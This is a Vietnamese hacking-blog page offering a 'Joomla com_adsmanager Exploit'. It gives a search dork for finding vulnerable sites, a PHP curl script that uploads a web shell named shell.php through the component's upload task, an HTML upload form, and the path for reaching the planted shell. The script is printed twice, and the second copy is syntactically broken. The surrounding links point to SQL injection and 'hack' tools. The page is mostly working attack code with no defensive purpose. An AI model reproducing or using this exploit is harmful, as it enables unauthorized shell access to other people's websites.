Joomla com_adsmanager Exploit

Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org

CODE PHP :

<?php

$url = "site.com/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array
(
"file" => "@shell.jpg",
"name" => "shell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;

?>

<?php

$url = "site.com/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here

$post = array

(

"file" => "@shell.jpg",

"name" => "shell.php"

);

$ch = curl_init ("$url");

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);

curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);

curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, );

curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, );

curl_setopt ($ch, CURLOPT_POST, 1);

@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);

$data = curl_exec ($ch);

curl_close ($ch);

echo $data;

#CSRF :

<form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

<form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"

enctype="multipart/form-data">

<input type="file" name="files[]" /><button>Upload</button>

</form>

Các bài viết liên quan

SQLMap v1.2.9 – Công cụ khai thác lỗ hổng SQL Injection mạnh nhất

11/09/2018

Tool khai thác lỗi SQL Injection với SQLi Dumper v8.2 Full

20/10/2017

Hướng dẫn code kiểm tra lỗ hổng bảo mật Sql Injection với Python script và cách phòng chống.

21/06/2017

SQLI Hunter v1.2 – Tự động tìm lỗi SQL Injection

27/12/2015

Acces Shell: site.com/tmp/plupload/shell.php

Xem thêm: SQLi cơ bản dành cho newbie

Tags: exploit joomla

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Joomla com_adsmanager Exploit

SQLMap v1.2.9 – Công cụ khai thác lỗ hổng SQL Injection mạnh nhất

Tool khai thác lỗi SQL Injection với SQLi Dumper v8.2 Full

Hướng dẫn code kiểm tra lỗ hổng bảo mật Sql Injection với Python script và cách phòng chống.

SQLI Hunter v1.2 – Tự động tìm lỗi SQL Injection

XSS Vulnerability

Hướng dẫn Tạo tool hack disconect LoL

AnonyViet

Related Posts

SQLMap v1.2.9 – Công cụ khai thác lỗ hổng SQL Injection mạnh nhất

Tool khai thác lỗi SQL Injection với SQLi Dumper v8.2 Full

Hướng dẫn code kiểm tra lỗ hổng bảo mật Sql Injection với Python script và cách phòng chống.

SQLI Hunter v1.2 – Tự động tìm lỗi SQL Injection

Dork SQL 2015

Havij 1.17 PRO

Hướng dẫn Tạo tool hack disconect LoL

1
Để lại bình luận

Liên hệ quảng cáo

Đối tác

Các bài mới

Cách bật chế độ tối Dark Mode trên Chrome để bảo vệ mắt

GIVEAWAY License Key Driver Booster 6 Auto Update Driver

TechSmith SnagIT 2019 Full Phần mềm chụp ảnh màn hình tốt nhất

Dựng video không cần phần mềm trên Windows 10

Hướng dẫn nhận 11$ để tạo VPS Free không cần Visa

Giới thiệu

AnonyViet

Giới thiệu

Bạn bè

Liên hệ

Bài viết mới

Joomla com_adsmanager Exploit

Các bài viết liên quan

XSS Vulnerability

Hướng dẫn Tạo tool hack disconect LoL

Related Posts

1 Để lại bình luận

Liên hệ quảng cáo

Đối tác

Các bài mới

Giới thiệu

AnonyViet

Giới thiệu

Bạn bè

Liên hệ

Bài viết mới

1
Để lại bình luận